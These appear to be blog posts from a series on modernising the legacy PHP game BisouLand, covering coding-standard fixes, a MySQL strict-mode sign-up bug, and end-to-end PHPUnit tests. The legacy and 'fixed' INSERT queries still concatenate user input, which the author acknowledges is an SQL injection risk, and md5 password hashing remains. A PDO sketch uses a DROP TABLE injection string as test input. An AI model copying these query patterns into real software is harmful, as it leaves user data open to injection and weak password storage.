'trailing_comma_in_multiline' => [
'after_heredoc' => true,
'elements' => [
// 'arguments', For PHP 7.3+
// 'array_destructuring', For PHP 7.1+
'arrays',
// 'match', For PHP 8.0+
// 'parameters', For PHP 8.0+
],
],
])
->setRiskyAllowed(true)
->setParallelConfig(ParallelConfigFactory::detect())
->setUsingCache(true)
->setFinder($finder)
;
Let's run the checks:
> make cs-check
PHP CS Fixer 3.88.2 Folding Bike by Fabien Potencier, Dariusz Ruminski and contributors.
PHP runtime: 8.4.12
Running analysis on 15 cores with 10 files per process.
Parallel runner is an experimental feature and may be unstable, use it at your own risk. Feedback highly appreciated!
Loaded config default from "/apps/qa/.php-cs-fixer.dist.php".
Using cache file ".php-cs-fixer.cache".
43/43 [▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓] 100%
1) ../monolith/web/calcul.php (concat_space, no_extra_blank_lines)
2) ../monolith/web/redirect.php (single_quote, single_line_comment_spacing, concat_space, yoda_style, no_extra_blank_lines)
3) ../monolith/web/checkConnect.php (increment_style, single_quote, single_line_comment_spacing, concat_space, yoda_style, no_extra_blank_lines)
4) ../monolith/web/phpincludes/fctIndex.php (single_space_around_construct, no_unneeded_control_parentheses, single_quote, single_line_comment_spacing, concat_space, yoda_style, no_extra_blank_lines, blank_line_before_statement)
5) ../monolith/web/phpincludes/topten.php (single_space_around_construct, no_unneeded_control_parentheses, increment_style, single_line_comment_spacing, concat_space, yoda_style, space_after_semicolon, no_extra_blank_lines)
6) ../monolith/web/phpincludes/pages.php (single_quote, single_line_comment_spacing)
7) ../monolith/web/deconnexion.php (single_quote, single_line_comment_spacing, concat_space, yoda_style, no_extra_blank_lines)
8) ../monolith/web/news/rediger_news.php (concat_space, no_extra_blank_lines)
9) ../monolith/web/news/chemin.php (blank_line_after_opening_tag)
10) ../monolith/web/news/liste_news.php (single_line_comment_spacing, concat_space, yoda_style, logical_operators, no_extra_blank_lines)
11) ../monolith/web/reductionNuages.php (single_line_comment_spacing)
12) ../monolith/web/phpincludes/evo.php (increment_style, single_quote, single_line_comment_spacing, concat_space, yoda_style, no_extra_blank_lines, blank_line_before_statement)
13) ../monolith/web/phpincludes/stats.php (single_space_around_construct, single_quote, semicolon_after_instruction, concat_space, space_after_semicolon)
14) ../monolith/web/phpincludes/infos.php (increment_style, single_line_comment_spacing, concat_space, yoda_style, space_after_semicolon)
15) ../monolith/web/phpincludes/cerveau.php (single_space_around_construct, no_unneeded_control_parentheses, single_quote, single_line_comment_spacing, concat_space, yoda_style, space_after_semicolon, no_extra_blank_lines)
16) ../monolith/web/phpincludes/yeux.php (no_unneeded_control_parentheses, single_quote, single_line_comment_spacing, concat_space, yoda_style, space_after_semicolon, no_extra_blank_lines)
17) ../monolith/web/phpincludes/inscription.php (single_quote, single_line_comment_spacing, concat_space, yoda_style, space_after_semicolon, no_extra_blank_lines)
18) ../monolith/web/phpincludes/faq.php (single_quote, single_line_comment_spacing, concat_space, no_extra_blank_lines)
19) ../monolith/web/phpincludes/construction.php (single_space_around_construct, no_unneeded_control_parentheses, increment_style, single_line_comment_spacing, concat_space, yoda_style, space_after_semicolon, no_extra_blank_lines)
20) ../monolith/web/phpincludes/recherche.php (single_quote, concat_space, yoda_style)
21) ../monolith/web/phpincludes/bd.php (concat_space)
22) ../monolith/web/phpincludes/accueil.php (single_quote, whitespace_after_comma_in_array, yoda_style, space_after_semicolon, no_extra_blank_lines)
23) ../monolith/web/phpincludes/lire.php (single_space_around_construct, single_quote, concat_space, yoda_style, space_after_semicolon, no_extra_blank_lines)
24) ../monolith/web/phpincludes/membres.php (modernize_types_casting, no_unneeded_control_parentheses, increment_style, single_quote, concat_space, no_singleline_whitespace_before_semicolons, yoda_style, no_extra_blank_lines, binary_operator_spaces)
25) ../monolith/web/phpincludes/nuage.php (single_space_around_construct, increment_style, single_quote, single_line_comment_spacing, concat_space, yoda_style, space_after_semicolon, no_extra_blank_lines)
26) ../monolith/web/phpincludes/attaque.php (no_empty_statement, no_unneeded_control_parentheses, single_quote, single_line_comment_spacing, concat_space, yoda_style, no_extra_blank_lines)
27) ../monolith/web/phpincludes/confirmation.php (no_unneeded_control_parentheses, increment_style, single_quote, single_line_comment_spacing, concat_space, yoda_style, space_after_semicolon, no_extra_blank_lines)
28) ../monolith/web/phpincludes/changepass.php (single_line_comment_spacing, concat_space, yoda_style, space_after_semicolon)
29) ../monolith/web/phpincludes/techno.php (single_space_around_construct, no_unneeded_control_parentheses, increment_style, single_line_comment_spacing, concat_space, yoda_style, space_after_semicolon, no_extra_blank_lines)
30) ../monolith/web/phpincludes/newpass.php (single_line_comment_spacing, concat_space, yoda_style, space_after_semicolon, no_extra_blank_lines)
31) ../monolith/web/makeBan.php (increment_style, single_quote, single_line_comment_spacing, concat_space, space_after_semicolon)
32) ../monolith/web/index.php (single_space_around_construct, increment_style, single_quote, no_spaces_after_function_name, single_line_comment_spacing, concat_space, include,no_singleline_whitespace_before_semicolons, yoda_style, space_after_semicolon, no_extra_blank_lines)
33) ../monolith/web/phpincludes/livreor.php (modernize_types_casting, no_unneeded_control_parentheses, increment_style, single_quote, semicolon_after_instruction, single_line_comment_spacing, native_constant_invocation, concat_space, no_singleline_whitespace_before_semicolons, yoda_style, no_extra_blank_lines, binary_operator_spaces)
34) ../monolith/web/phpincludes/bisous.php (single_space_around_construct, no_unneeded_control_parentheses, increment_style, single_line_comment_spacing, concat_space, yoda_style, space_after_semicolon, no_extra_blank_lines)
35) ../monolith/web/phpincludes/connexion.php (yoda_style, no_extra_blank_lines)
36) ../monolith/web/phpincludes/boite.php (indentation_type, single_space_around_construct, increment_style, single_quote, single_line_comment_spacing, concat_space, yoda_style, space_after_semicolon, no_extra_blank_lines)
37) ../monolith/web/phpincludes/connected.php (indentation_type, single_quote, single_line_comment_spacing, concat_space, yoda_style, no_extra_blank_lines)
38) ../monolith/web/phpincludes/envoi.php (single_quote, single_line_comment_spacing, concat_space, yoda_style, space_after_semicolon, no_extra_blank_lines)
39) ../monolith/web/phpincludes/action.php (no_unneeded_braces, single_quote, single_line_comment_spacing, concat_space, yoda_style, space_after_semicolon, no_extra_blank_lines, no_whitespace_in_blank_line)
Found 39 of 43 files that can be fixed in 0.212 seconds, 16.00 MB memory used
All safe, it'd seem. Let's apply those then: make cs-fix
By progressively applying PHP CS Fixer rule sets, we've transformed BisouLand's chaotic 2005 code into something that follows modern standards.
The key insight here is incrementalism: we didn't jump straight to the strictest rule set, but instead built up gradually.
Along the way we also learned to opt out of rules that don't play well with this code base (e.g. statement_indentation breaks mixed HTML/PHP files).
The final configuration gives us automated formatting that makes the code more readable and maintainable, without breaking functionality.
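As an illustration, the end state could be captured in a .php-cs-fixer.dist.php along these lines (a sketch only; the rule sets and opted-out rules shown here are illustrative, not BisouLand's exact configuration):

```php
<?php
// Sketch of a PHP CS Fixer configuration built up incrementally
// (illustrative, not BisouLand's exact rule list). Rule sets stack,
// and individual rules can be opted out when they break the code base.
$finder = PhpCsFixer\Finder::create()
    ->in(__DIR__.'/../monolith/web');

return (new PhpCsFixer\Config())
    ->setRules([
        '@PER-CS' => true,
        '@Symfony' => true,
        // Opted out: statement_indentation breaks mixed HTML/PHP files.
        'statement_indentation' => false,
    ])
    ->setFinder($finder);
```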
Now, before we move on, here's a super secret PHP CS Fixer tip:
you can run php-cs-fixer describe <rule/ruleset>,
which serves as local documentation:
> docker compose exec app php vendor/bin/php-cs-fixer describe trailing_comma_in_multiline
PHP CS Fixer 3.88.2 Folding Bike by Fabien Potencier, Dariusz Ruminski and contributors.
PHP runtime: 8.4.12
Description of the `trailing_comma_in_multiline` rule.
Arguments lists, array destructuring lists, arrays that are multi-line, `match`-lines and parameters lists must have a trailing comma.
Fixer is configurable using following options:
* after_heredoc (bool): whether a trailing comma should also be placed after heredoc end; defaults to false
* elements (a subset of ['arguments', 'array_destructuring', 'arrays', 'match', 'parameters']): where to fix multiline trailing comma (PHP >= 8.0 for `parameters` and `match`); defaults to ['arrays']
Fixing examples:
* Example #1. Fixing with the default configuration.
---------- begin diff ----------
--- Original
+++ New
@@ -1,5 +1,5 @@
<?php
array(
1,
- 2
+ 2,
);
----------- end diff -----------
* Example #2. Fixing with configuration: ['after_heredoc' => true].
---------- begin diff ----------
--- Original
+++ New
@@ -1,7 +1,7 @@
<?php
$x = [
'foo',
<<<EOD
bar
- EOD
+ EOD,
];
----------- end diff -----------
* Example #3. Fixing with configuration: ['elements' => ['arguments']].
---------- begin diff ----------
--- Original
+++ New
@@ -1,5 +1,5 @@
<?php
foo(
1,
- 2
+ 2,
);
----------- end diff -----------
* Example #4. Fixing with configuration: ['elements' => ['parameters']].
---------- begin diff ----------
--- Original
+++ New
@@ -1,7 +1,7 @@
<?php
function foo(
$x,
- $y
+ $y,
)
{
}
----------- end diff -----------
The fixer is part of the following rule sets:
* @PER *(deprecated)* with config: ['after_heredoc' => true, 'elements' => ['arguments', 'array_destructuring', 'arrays', 'match', 'parameters']]
* @PER-CS with config: ['after_heredoc' => true, 'elements' => ['arguments', 'array_destructuring', 'arrays', 'match', 'parameters']]
* @PER-CS2.0 *(deprecated)* with config: ['after_heredoc' => true, 'elements' => ['arguments', 'array_destructuring', 'arrays', 'match', 'parameters']]
* @PER-CS2x0 with config: ['after_heredoc' => true, 'elements' => ['arguments', 'array_destructuring', 'arrays', 'match', 'parameters']]
* @PER-CS3.0 *(deprecated)* with config: ['after_heredoc' => true, 'elements' => ['arguments', 'array_destructuring', 'arrays', 'match', 'parameters']]
* @PER-CS3x0 with config: ['after_heredoc' => true, 'elements' => ['arguments', 'array_destructuring', 'arrays', 'match', 'parameters']]
* @PHP73Migration *(deprecated)* with config: ['after_heredoc' => true]
* @PHP74Migration *(deprecated)* with config: ['after_heredoc' => true]
* @PHP7x3Migration with config: ['after_heredoc' => true]
* @PHP7x4Migration with config: ['after_heredoc' => true]
* @PHP80Migration *(deprecated)* with config: ['after_heredoc' => true]
* @PHP81Migration *(deprecated)* with config: ['after_heredoc' => true]
* @PHP82Migration *(deprecated)* with config: ['after_heredoc' => true]
* @PHP83Migration *(deprecated)* with config: ['after_heredoc' => true]
* @PHP84Migration *(deprecated)* with config: ['after_heredoc' => true]
* @PHP85Migration *(deprecated)* with config: ['after_heredoc' => true]
* @PHP8x0Migration with config: ['after_heredoc' => true]
* @PHP8x1Migration with config: ['after_heredoc' => true]
* @PHP8x2Migration with config: ['after_heredoc' => true]
* @PHP8x3Migration with config: ['after_heredoc' => true]
* @PHP8x4Migration with config: ['after_heredoc' => true]
* @PHP8x5Migration with config: ['after_heredoc' => true]
* @PhpCsFixer with config: ['after_heredoc' => true, 'elements' => ['array_destructuring', 'arrays']]
* @Symfony with config: ['after_heredoc' => true, 'elements' => ['array_destructuring', 'arrays', 'match', 'parameters']]
⁉️ Hold on, what about those SQL injection vulnerabilities?
🤘 The Beta Destroyer breaks free from the crypts of Manual Testing, forging unbreakable chains of End to End test scenarios, binding every component in the unholy covenant of automations! 🔥
In this series, we're dealing with BisouLand, an eXtreme Legacy application (2005 LAMP spaghetti code base). So far, we have:
This means we can run it locally (http://localhost:8080/), and have some level of automated tests.
But currently the tests are failing!
So, we'll inspect the issue, identify it, write End to End tests which will be today's third article focus, and finally we'll fix the bug.

Let's run the tests to see the failure messages:
make test arg='--testdox --filter PlayerPages'
PHPUnit 12.3.2 by Sebastian Bergmann and contributors.
Runtime: PHP 8.4.12
Configuration: /apps/qa/phpunit.xml.dist
FFFFFFFFFFFF............ 24 / 24 (100%)
Time: 00:00.081, Memory: 18.00 MB
Player Pages (Bl\Qa\Tests\Smoke\PlayerPages)
✘ it loads account page (`/connected.html`) for logged in players
┐
├ Failed asserting that Page loads for logged in players
│
│ /apps/qa/tests/Smoke/Assertion/Assert.php:41
│ /apps/qa/tests/Smoke/PlayerPagesTest.php:45
┴
[...]
FAILURES!
Tests: 24, Assertions: 24, Failures: 12.
The player cannot log in... Let's try manually; first, we need to sign up a new player:

It worked:

Now let's log in:

But it fails! The error says the username doesn't exist:

Inspecting the database shows that the player data wasn't inserted.
The Smoke Tests didn't directly catch the login error,
because the error is printed inside the HTML,
and our tests only check for a 200 status code.
This highlights the limits of Smoke Tests (though, to be fair, they did indirectly catch the issue, since players were unable to log in).
The code handling signing up is located in ./apps/monolith/web/phpincludes/inscription.php,
and hold on to your socks because it looks like this:
<?php
if (false == $_SESSION['logged']) {
$send = 0;
$pseudo = '';
$mdp = '';
if (isset($_POST['inscription'])) {
// Mesure de securite.
$pseudo = htmlentities(addslashes($_POST['Ipseudo']));
$mdp = htmlentities(addslashes($_POST['Imdp']));
$mdp2 = htmlentities(addslashes($_POST['Imdp2']));
// Prevoir empecher de prendre un pseudo deje existant
// Si les variables contenant le pseudo, le mot de passe existent et contiennent quelque chose.
if (isset($_POST['Ipseudo'], $_POST['Imdp'], $_POST['Imdp2']) && !empty($_POST['Ipseudo']) && !empty($_POST['Imdp']) && !empty($_POST['Imdp2'])) {
if ($mdp == $mdp2) {
// Si le pseudo est superieur e 3 caracteres et inferieur e 35 caracteres.
$taille = strlen(trim($_POST['Ipseudo']));
if ($taille >= 4 && $taille <= 15) {
/* //Mesure de securite.
$pseudo = htmlentities(addslashes($_POST['pseudo']));
$mdp = htmlentities(addslashes($_POST['mdp']));*/
// La requete qui compte le nombre de pseudos
$sql = mysql_query("SELECT COUNT(*) AS nb_pseudo FROM membres WHERE pseudo='".$pseudo."'");
// Verifie si le pseudo n'est pas deje pris.
if (0 == mysql_result($sql, 0, 'nb_pseudo') && 'BisouLand' != $pseudo) {
// Verifie que le pseudo est correct.
if (preg_match("!^\w+$!", $pseudo)) {
if (preg_match("!^\w+$!", $mdp)) {
// Si le mot de passe est superieur e 4 caracteres.
$taille = strlen(trim($_POST['Imdp']));
if ($taille >= 5 && $taille <= 15) {
// On execute la requete qui enregistre un nouveau membre.
// Hashage du mot de passe avec md5().
$hmdp = md5($mdp);
mysql_query("INSERT INTO membres (id, pseudo, mdp, confirmation, lastconnect) VALUES ('', '".$pseudo."', '".$hmdp."', '1', ".time().')');
echo 'Ton inscription est confirmée ! Tu peux maintenant te connecter.<br />';
$send = 1;
} else {
echo 'Erreur : le mot de passe est soit trop court, soit trop long !';
}
} else {
echo 'Erreur : le mot de passe n\'est pas valide !';
}
} else {
echo 'Erreur : le pseudo n\'est pas valide !';
}
} else {
echo 'Erreur : pseudo deje pris !';
}
} else {
echo 'Erreur : le pseudo est soit trop court, soit trop long !';
}
} else {
echo 'Erreur : Tu n\'as pas rentre deux fois le meme mot de passe !';
}
} else {
echo 'Erreur : Pense e remplir tous les champs !';
}
}
if (0 == $send) {
?>
<form method="post" class="formul" action="inscription.html">
<label>Pseudo :<br /><span class="petit">(Entre 4 et 15 caracteres)</span><br /><input type="text" name="Ipseudo" tabindex="10" size="15" maxlength="15" value="<?php echo stripslashes($pseudo); ?>"/></label><br />
<label>Mot de passe : <br /><span class="petit">(Entre 5 et 15 caracteres)</span><br /><input type="password" name="Imdp" tabindex="20" size="15" maxlength="15" value=""/></label><br />
<label>Reecris le mot de passe : <br /><input type="password" name="Imdp2" tabindex="30" size="15" maxlength="15" value=""/></label><br />
<input type="submit" name="inscription" value="S'inscrire" />
</form>
<?php
}
} else {
echo 'Pfiou t\'es dja connected toi !!';
}
?>
Now, that's eXtreme Legacy!!!
Let's focus on the problematic line, which is supposed to save the player's data in the database (I've reformatted it a bit for readability):
mysql_query(
'INSERT INTO membres (id, pseudo, mdp, confirmation, timestamp, lastconnect, amour)'
." VALUES ('', '{$pseudo}', '{$hmdp}', '1', ".time().', '.time().", '300')"
);
There are many problems here (deprecated function, SQL injection vulnerability,
use of the cryptographically broken md5 for password hashing, etc.),
but what jumps out at me is the use of '' for the ID value.
After some research it turns out this code worked fine in older MySQL versions,
because MySQL would silently convert the empty string to 0,
and since the id field is an AUTO_INCREMENT integer,
MySQL would then treat that 0 as a signal to generate the next sequence value.
However, MySQL 5.7 (the version we picked!), released in October 2015,
introduced a significant change: STRICT_TRANS_TABLES became enabled by default.
This means MySQL now rejects data type errors like this one.
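To make the behaviour change concrete, here's a sketch of both modes (assuming a trimmed-down membres table; the exact error text varies by MySQL version):

```sql
-- Pre-5.7 behaviour (or with strict mode disabled): '' is silently coerced
-- to 0, and 0 in an AUTO_INCREMENT column means "generate the next id".
SET SESSION sql_mode = '';
INSERT INTO membres (id, pseudo) VALUES ('', 'demo');   -- works, id auto-generated

-- With STRICT_TRANS_TABLES (the 5.7 default), the coercion becomes a hard error:
SET SESSION sql_mode = 'STRICT_TRANS_TABLES';
INSERT INTO membres (id, pseudo) VALUES ('', 'demo');
-- ERROR 1366: Incorrect integer value: '' for column 'id'
```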
So we could fix the issue by changing the MySQL version, but the end goal is to upgrade to the most recent versions, not to downgrade, so let's fix the code instead.
But first, we need to write a test: Test Driven Development, or no tests at all! 🤘
There are two kinds of tests that I hate: Smoke Tests, and End to End Tests.
End to End tests are usually about navigating the application, which is slow, and checking the content of the response, which is brittle.
However, in this scenario there is no alternative for testing the features: there is no HTTP framework, and no handler / controller / service classes that would allow us to write Functional / Integration / System tests.
To test our sign-up, all we can do is submit the form over HTTP, then check the database for the expected record.
So let's just do that:
<?php
declare(strict_types=1);
namespace Bl\Qa\Tests\EndToEnd;
use Bl\Qa\Tests\EndToEnd\Assertion\Assert;
use Bl\Qa\Tests\Infrastructure\Scenario\SignUpNewPlayer;
use Bl\Qa\Tests\Infrastructure\TestKernelSingleton;
use PHPUnit\Framework\Attributes\CoversNothing;
use PHPUnit\Framework\Attributes\DataProvider;
use PHPUnit\Framework\Attributes\Large;
use PHPUnit\Framework\Attributes\TestDox;
use PHPUnit\Framework\TestCase;
#[CoversNothing]
#[Large]
final class SignUpTest extends TestCase
{
public function test_it_allows_visitors_to_become_players(): void
{
$player = SignUpNewPlayer::run(
'BisouTest',
'password',
'password',
);
Assert::signedUpCount($player->username, 1);
}
#[DataProvider('invalidCredentialsProvider')]
#[TestDox('It prevents invalid credentials: $description')]
public function test_it_prevents_invalid_credentials(string $username, string $password, string $description): void
{
SignUpNewPlayer::run(
$username,
$password,
$password,
);
Assert::signedUpCount($username, 0);
}
/**
* [string $username, string $password, string $description][].
*
* @return array<array{string, string, string}>
*/
public static function invalidCredentialsProvider(): array
{
return [
['usr', 'password', 'username too short (< 4 characters)'],
['test_sign_up02__', 'password', 'username too long (> 15 characters)'],
['test_sign_up03!', 'password', 'username contains special characters (non alpha-numerical, not an underscore (`_`))'],
['test_sign_up05', 'pass', 'password too short (< 5 characters)'],
['test_sign_up06', 'passwordthatistoolong', 'password too long (> 15 characters)'],
['test_sign_up07', 'password!', 'password contains special characters (non alpha-numerical, not an underscore (`_`))'],
['BisouLand', 'password', 'system account, for notifications'],
];
}
#[TestDox('It prevents usernames that are already used')]
public function test_it_prevents_usernames_that_are_already_used(): void
{
$username = 'BisouTest_';
$password = 'password';
$passwordConfirmation = $password;
// First registration should succeed
SignUpNewPlayer::run(
$username,
$password,
$passwordConfirmation,
);
// Second registration should fail
SignUpNewPlayer::run(
$username,
$password,
$passwordConfirmation,
);
Assert::signedUpCount($username, 1);
}
public function test_it_prevents_passwords_that_do_not_match_confirmation(): void
{
$username = 'BisouTest';
$password = 'password';
$passwordConfirmation = 'different';
SignUpNewPlayer::run(
$username,
$password,
$passwordConfirmation
);
Assert::signedUpCount($username, 0);
}
}
If I've read the long and nested if statements correctly, this should cover all the different sign-up scenarios, including username and password checking.
For now let's just run the "happy scenario" test to make sure it fails:
make test arg='--testdox --filter test_it_allows_visitors_to_become_players'
PHPUnit 12.3.2 by Sebastian Bergmann and contributors.
Runtime: PHP 8.4.12
Configuration: /apps/qa/phpunit.xml.dist
F 1 / 1 (100%)
Time: 00:00.032, Memory: 18.00 MB
Sign Up (Bl\Qa\Tests\EndToEnd\SignUp)
✘ It allows visitors to become players
┐
├ Failed asserting that Signed Up Count 0 is 1
│
│ /apps/qa/tests/EndToEnd/Assertion/Assert.php:114
│ /apps/qa/tests/EndToEnd/SignUpTest.php:30
┴
FAILURES!
Tests: 1, Assertions: 1, Failures: 1.
Brilliant! Before we fix it, I'll dive a bit more into the test details.
I was surprised to find out that the username BisouLand is forbidden;
it turns out it's used to send system notifications
(though I note the check is case sensitive).
This is actually what inspired me to use BisouTest as a special test username.
If you remember, in the SignUpNewPlayer scenario,
which we've reused from the Smoke Tests since the logic would have been identical,
we have the following:
if ('BisouTest' === $username) {
$username = substr('BisouTest_'.uniqid(), 0, 15);
}
This makes sure that there will be no username duplicates.
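As a quick sanity check (a standalone sketch; the prefix and the 15-character cap come from the app's username rules), the generated name still satisfies the sign-up validation:

```php
<?php
// Standalone check of the unique-username trick used by SignUpNewPlayer.
// 'BisouTest_' is 10 characters, so only the first 5 characters of
// uniqid() survive the truncation to the app's 15-character limit.
$username = substr('BisouTest_'.uniqid(), 0, 15);

assert(15 === strlen($username));                  // within the 4-15 length rule
assert(str_starts_with($username, 'BisouTest_')); // matched by the cleanup's LIKE 'BisouTest%'
assert(1 === preg_match('!^\w+$!', $username));   // still passes the sign-up regex
```

Worth noting: the truncation keeps only the first five characters of uniqid(), which are the slow-moving high-order timestamp digits, so two sign-ups in the same run could still collide; the prefix-based cleanup matters more than the uniqueness guarantee here.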
One thing I didn't mention in my previous article is that I've set up a way
to clean up the test data with the DeleteAllTestPlayers scenario:
<?php
declare(strict_types=1);
namespace Bl\Qa\Tests\Infrastructure\Scenario;
use Bl\Qa\Tests\Infrastructure\TestKernelSingleton;
final readonly class DeleteAllTestPlayers
{
public static function run(): void
{
$pdo = TestKernelSingleton::get()->pdo();
$pdo->query("DELETE FROM membres WHERE pseudo LIKE 'BisouTest%'");
}
}
This is called by a PHPUnit subscriber for the TestRunner\Finished event:
<?php
declare(strict_types=1);
namespace Bl\Qa\Tests\Infrastructure\Subscriber;
use Bl\Qa\Tests\Infrastructure\Scenario\DeleteAllTestPlayers;
use PHPUnit\Event\TestRunner\Finished;
use PHPUnit\Event\TestRunner\FinishedSubscriber;
final readonly class TestCleanupSubscriber implements FinishedSubscriber
{
public function notify(Finished $event): void
{
DeleteAllTestPlayers::run();
}
}
This will be called once the test suite has finished executing, but only if we register the subscriber in a PHPUnit Extension:
<?php
declare(strict_types=1);
namespace Bl\Qa\Tests\Infrastructure\Subscriber;
use PHPUnit\Runner\Extension\Extension;
use PHPUnit\Runner\Extension\Facade;
use PHPUnit\Runner\Extension\ParameterCollection;
use PHPUnit\TextUI\Configuration\Configuration;
final readonly class TestCleanupExtension implements Extension
{
public function bootstrap(Configuration $configuration, Facade $facade, ParameterCollection $parameters): void
{
$facade->registerSubscriber(new TestCleanupSubscriber());
}
}
The extension also has to be registered in the phpunit.xml config:
<?xml version="1.0" encoding="UTF-8"?>
<!-- https://phpunit.readthedocs.io/en/latest/configuration.html -->
<phpunit xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="vendor/phpunit/phpunit/phpunit.xsd"
bootstrap="vendor/autoload.php"
cacheDirectory=".phpunit.cache"
executionOrder="depends,defects"
shortenArraysForExportThreshold="10"
requireCoverageMetadata="true"
beStrictAboutCoverageMetadata="true"
beStrictAboutOutputDuringTests="true"
displayDetailsOnPhpunitDeprecations="true"
colors="true"
failOnPhpunitDeprecation="true"
failOnRisky="true"
failOnWarning="true">
<php>
<ini name="display_errors" value="1" />
<ini name="error_reporting" value="-1" />
<env name="APP_ENV" value="test" force="true" />
<env name="SHELL_VERBOSITY" value="-1" />
</php>
<testsuites>
<testsuite name="smoke">
<directory>tests/Smoke</directory>
</testsuite>
<testsuite name="end-to-end">
<directory>tests/EndToEnd</directory>
</testsuite>
</testsuites>
<extensions>
<bootstrap class="Bl\Qa\Tests\Infrastructure\Subscriber\TestCleanupExtension"/>
</extensions>
<source ignoreIndirectDeprecations="true" restrictNotices="true" restrictWarnings="true">
<include>
<directory>../monolith/web</directory>
</include>
</source>
</phpunit>
I've created a signedUpCount custom assertion,
which counts the number of records persisted in the database for a given
username:
<?php
declare(strict_types=1);
namespace Bl\Qa\Tests\EndToEnd\Assertion;
use Bl\Qa\Tests\Infrastructure\TestKernelSingleton;
use PHPUnit\Framework\Assert as PHPUnitAssert;
final readonly class Assert
{
public static function signedUpCount(string $username, int $expectedCount): void
{
$pdo = TestKernelSingleton::get()->pdo();
$stmt = $pdo->prepare('SELECT COUNT(*) FROM membres WHERE pseudo = :username');
$stmt->execute([
'username' => $username,
]);
$actualCount = (int) $stmt->fetchColumn();
PHPUnitAssert::assertSame(
$expectedCount,
$actualCount,
"Failed asserting that Signed Up Count {$actualCount} is {$expectedCount}",
);
}
}
I think there's an argument for having made two assertions instead
(e.g. signedUpSuccessful count = 1, and signedUpFailed count = 0),
but for now I'm happy with this.
We're going to fix that bug by removing the ID field from the query:
mysql_query(
'INSERT INTO membres (pseudo, mdp, confirmation, timestamp, lastconnect, amour)'
." VALUES ('{$pseudo}', '{$hmdp}', '1', ".time().', '.time().", '300')"
);
Let's see if the bug is fixed by running the one test:
make test arg='--testdox --filter test_it_allows_visitors_to_become_players'
PHPUnit 12.3.2 by Sebastian Bergmann and contributors.
Runtime: PHP 8.4.12
Configuration: /apps/qa/phpunit.xml.dist
. 1 / 1 (100%)
Time: 00:00.018, Memory: 18.00 MB
Sign Up (Bl\Qa\Tests\EndToEnd\SignUp)
✔ It allows visitors to become players
OK (1 test, 1 assertion)
So far so good, let's confirm by running all the tests:
make test
PHPUnit 12.3.2 by Sebastian Bergmann and contributors.
Runtime: PHP 8.4.12
Configuration: /apps/qa/phpunit.xml.dist
................................................. 49 / 49 (100%)
Time: 00:00.162, Memory: 18.00 MB
OK (49 tests, 49 assertions)
Excellent! All fixed!
I suspect there are many more instances of this pattern, and given the success of this fix we can assume it's safe to apply to them all.
But I know these mysql_query calls will be removed very soon.
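When they are replaced, the natural fix for the injection is a parameterized query. Here's a sketch using PDO, with an in-memory SQLite database standing in for MySQL and a trimmed-down membres table (column names come from the app; everything else is illustrative):

```php
<?php
// Sketch: the same insert as a parameterized query, which removes the SQL
// injection vector entirely. SQLite in-memory stands in for MySQL here,
// and the membres table is trimmed down to the columns we care about.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE membres (
    id INTEGER PRIMARY KEY AUTOINCREMENT,
    pseudo TEXT NOT NULL,
    mdp TEXT NOT NULL,
    confirmation TEXT NOT NULL,
    lastconnect INTEGER NOT NULL
)');

$stmt = $pdo->prepare(
    'INSERT INTO membres (pseudo, mdp, confirmation, lastconnect)
     VALUES (:pseudo, :mdp, :confirmation, :lastconnect)'
);
$stmt->execute([
    'pseudo' => "Robert'); DROP TABLE membres;--", // hostile input is just data now
    'mdp' => md5('password'), // still md5 for now; password_hash() is a later fix
    'confirmation' => '1',
    'lastconnect' => time(),
]);

assert(1 === (int) $pdo->query('SELECT COUNT(*) FROM membres')->fetchColumn());
```

With placeholders, the hostile pseudo above is stored verbatim instead of being executed as SQL.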
The End to End tests we've written would also allow us to refactor the code: instead of nested conditionals, we could for example use early returns.
But if I'm going to refactor that code, I want to do it right: first by writing unit tests that will let a design model emerge, then by creating an API so we can also have integration tests.
Once we have these, both the Smoke Tests and End to End tests can be removed.
So I'm going to leave this as is for now.
⁉️ What do you mean, "the code is ugly"??
🤘 The Quality Avenger emerges from the burning forges of Coding Standards, smelting the ores of Static Analysis into the moulds of Automated Testing. 🔥
In this series, we're dealing with BisouLand, an eXtreme Legacy application (2005 LAMP spaghetti code base). So far, we have:
This means we can access it (http://localhost:8080/) and manually check it. Unfortunately, looking at the code, it's obvious we cannot ship it to production as is: it has many issues that need fixing first.
But how do we know we're not breaking anything when fixing these? As things currently stand, we don't even know what features BisouLand has.
So, we're going to need to write tests, which will be today's second article focus.
The first plan of action is to move the current app into the ./apps/monolith
sub-folder, and to create a new QA one in ./apps/qa.
This approach will allow us to isolate the legacy code from any tooling we might need to bring it up to standards.
The QA application has the following tree directory:
apps/qa/
├── composer.json
├── composer.lock
├── compose.yaml
├── Dockerfile
├── Makefile
├── phpstan-baseline.neon
├── phpstan.neon.dist
├── phpunit.xml.dist
├── README.md
└── tests/
As you can see, it has its own Dockerfile:
# syntax=docker/dockerfile:1
###
# PHP Dev Container
# Utility Tools: PHP, bash, Composer
###
FROM php:8.4-cli-alpine AS php_dev_container
# Composer environment variables:
# * default user is superuser (root), so allow them
# * put cache directory in a readable/writable location
# _Note_: When running `composer` in container, use `--no-cache` option
ENV COMPOSER_ALLOW_SUPERUSER=1 \
COMPOSER_CACHE_DIR=/tmp/.composer/cache
# Install dependencies:
# * bash for shell access and scripting
# * zip for composer packages that use ZIP archives
# _Note (Alpine)_: `--no-cache` includes `--update` and keeps image size minimal
#
# Then install PHP extensions
#
# _Note (Hadolint)_: No version locking, since Alpine only ever provides one version
# hadolint ignore=DL3018
RUN apk add --update --no-cache \
bash \
libzip-dev \
zip \
&& docker-php-ext-install \
bcmath \
pdo \
pdo_mysql \
zip
# Copy Composer binary from composer image
# _Note (Hadolint)_: False positive as `COPY` works with images too
# See: https://github.com/hadolint/hadolint/issues/197#issuecomment-1016595425
# hadolint ignore=DL3022
COPY --from=composer:2 /usr/bin/composer /usr/bin/composer
WORKDIR /apps/qa
# Caching `composer install`, as long as composer.{json,lock} don't change.
COPY composer.json composer.lock ./
RUN composer install \
--no-cache \
--no-interaction \
--no-plugins \
--no-scripts \
--optimize-autoloader
# Copy the remaining application files (excluding those listed in .dockerignore)
COPY . .
And compose.yaml:
name: skyswoon-qa
services:
app:
build: .
command: php -S 0.0.0.0:8081
volumes:
# Mount current directory into container for QA tools and configs
- .:/apps/qa
